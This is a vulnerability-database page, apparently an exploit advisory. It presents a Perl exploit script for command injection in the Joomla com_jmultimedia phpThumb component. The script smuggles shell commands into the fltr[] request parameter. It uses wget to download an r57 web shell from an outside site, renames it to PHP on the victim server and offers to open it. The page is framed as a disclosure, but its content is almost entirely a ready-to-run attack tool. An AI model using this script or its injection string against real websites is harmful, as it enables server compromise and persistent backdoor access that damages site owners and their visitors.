Joomla com_jmultimedia Remote Command Execution

2013.12.01
Credit: Deepankar Arora and Rafay Baloch
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/perl # Exploit Title: com_jmultimedia Remote Command Execution # Author: Deepankar Arora and Rafay Baloch # Vendor: http://joomlacode.org/gf/project/denvideo/ # Enter the target in this form --> http://victim.com/ # Change shell path to your own, if needed use LWP::UserAgent; use HTTP::Request; $target = $ARGV[0]; if($target eq '') { print "======================================================\n"; print " com_jmultimedia Remote Command Execution exploit \n"; print " (Automatic Shell Upload) \n"; print " Deepankar Arora and Rafay Baloch \n"; print "======================================================\n"; sleep(0.8); print "Usage: perl exploit.pl <target> \n"; exit(1); } if ($target !~ /http:\/\//) { $target = "http://$target"; } #print "[*] Enter the address of your hosted TXT shell (ex: ' http://c99.gen.tr/r57.txt') => "; #$shell = <STDIN>; sleep(1); print "======================================================\n"; print " com_jmultimedia Remote Command Execution exploit \n"; print " (Automatic Shell Upload) \n"; print " By Deepankar Arora and Rafay Baloch \n"; print "======================================================\n"; sleep(1.1); print "[*] Sending exploit ... \n"; sleep(1.1); $agent = LWP::UserAgent->new(); $agent->agent('Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1'); $shell = "wget http://www.r57c99shell.net/shell/r57.txt -O shell.txt"; $website = "$target/components/com_jmultimedia/assets/thumbs/phpthumb/phpThumb.php?src=file.jpg&fltr []=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; $shell ; &phpThumbDebug=9"; $request = $agent->request(HTTP::Request->new(GET=>$website)); if ($request->is_success) { print "[+] Exploit sent with success. \n"; sleep(1.4); } else { print "[-] Exploit sent but probably the website is not vulnerable. \n"; sleep(1.3); } print "[*] Checking if the txt shell has been uploaded...\n"; sleep(1.2); $cwebsite = "$target/components/com_jmultimedia/assets/thumbs/phpthumb/shell.txt"; $creq = $agent->request(HTTP::Request->new(GET=>$cwebsite)); if ($creq->is_success) { print "[+] Txt Shell uploaded :) \n"; sleep(1); print "[*] Moving it to PHP format... Please wait... \n"; sleep(1.1); $mvwebsite = "$target/components/com_jmultimedia/assets/thumbs/phpthumb/phpThumb.php? src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; mv shell.txt shell.php ; &phpThumbDebug=9"; $mvreq = $agent->request(HTTP::Request->new(GET=>$mvwebsite)); $cwebsite = "$target/components/com_jmultimedia/assets/thumbs/phpthumb/shell.php"; $c2req = $agent->request(HTTP::Request->new(GET=>$cwebsite)); if ($c2req->is_success) { print "[+] PHP Shell uploaded => $cwebsite :) \n"; sleep(0.8); print "[*] Do you want to open it? (y/n) => "; $open = <STDIN>; if ($open == "y") { $firefox = "firefox $cwebsite"; system($firefox); } } else { print "[-] Error while moving shell from txt to PHP :( \n"; exit(1); } } else { print "[-] Txt shell not uploaded. :( \n"; }

References:

http://joomlacode.org/gf/project/denvideo/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top